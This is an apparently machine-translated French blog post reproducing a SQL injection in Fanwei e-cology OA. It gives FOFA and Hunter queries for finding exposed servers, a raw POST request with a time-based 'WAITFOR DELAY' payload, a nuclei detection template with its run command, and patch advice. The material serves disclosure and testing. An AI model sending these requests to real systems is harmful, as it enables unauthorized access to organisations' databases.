[Récurrence de la vulnérabilité] Vulnérabilité d'injection SQL de la réception de l'e-cologie Fanwei

0x01 Notes de lecture

Les articles techniques de Tianqing Attack and Defense Lab sont fournis à titre de référence uniquement. Les informations fournies dans cet article sont uniquement destinées au personnel de sécurité du réseau pour tester ou maintenir les sites Web, les serveurs, etc. (y compris, mais sans s'y limiter), dont ils sont responsables. Veuillez ne pas l'utiliser sans autorisation. Les informations techniques contenues dans l'article sont utilisées pour s'introduire dans n'importe quel système informatique. Les conséquences et pertes directes ou indirectes causées par l'utilisation des informations fournies dans cet article seront à la charge de l'utilisateur lui-même. Les outils fournis dans cet article sont uniquement destinés à l’apprentissage, et toute autre utilisation est interdite ! ! !

Description de la vulnérabilité 0x02

(1) Fanwei e-cologie

Fanwei e-cology est une plateforme de gestion collaborative développée par Fanwei Network Technology, qui prend en charge la gestion multifonctionnelle des ressources humaines, des finances, de l'administration et du bureau mobile. La vulnérabilité est due au fait que Fanwei e-cology n'a pas filtré efficacement les entrées de l'utilisateur et les a directement insérées dans l'instruction de requête SQL, ce qui a entraîné une vulnérabilité d'injection SQL dans le système.

Syntaxe FOFA :

app.name=="泛微 e-cology 9.0 OA"

Syntaxe du chasseur :

app.name="泛微 e-cology 9.0 OA"app.name="泛微 e-cology OA"


(2) Poc de vulnérabilité

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveReferer: 127.0.0.1:9999/wui/index.htmlContent-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.9Content-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

Injecter en utilisant sqlmap

script d'analyse des noyaux

Source : https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

id: ecology-oa-filedownloadforoutdoc-sqliinfo:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqlirequests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {
   
   {Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close                fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

Plus de POC de vulnérabilité publiés sur Knowledge Planet

  

 Un thème récent pour la planète et quelques démonstrations des outils à l'intérieur de la planète

Expédition des membres d’Inner Planet

Le dernier partage d'une journée sur les vulnérabilités de sécurité Web Partage de compétences en matière d'exploration de vulnérabilités

   Rejoignez la planète, veuillez rechercher le laboratoire d'offensive et de défense de Tianqing dans l'application Knowledge Planet, plus excitant, alors restez à l'écoute

Plan de réparation 0x03

Atténuation officielle des correctifs

lien de patch

  • suggestion de réparation

Le responsable a émis une suggestion de réparation, recommandant aux utilisateurs concernés de mettre à niveau vers la dernière version du correctif v10.58.0 dès que possible.

Adresse de téléchargement : https://www.weaver.com.cn/cs/securityDownload.asp#

Je suppose que tu aimes

Origine blog.csdn.net/2301_79099363/article/details/131692158
conseillé
Classement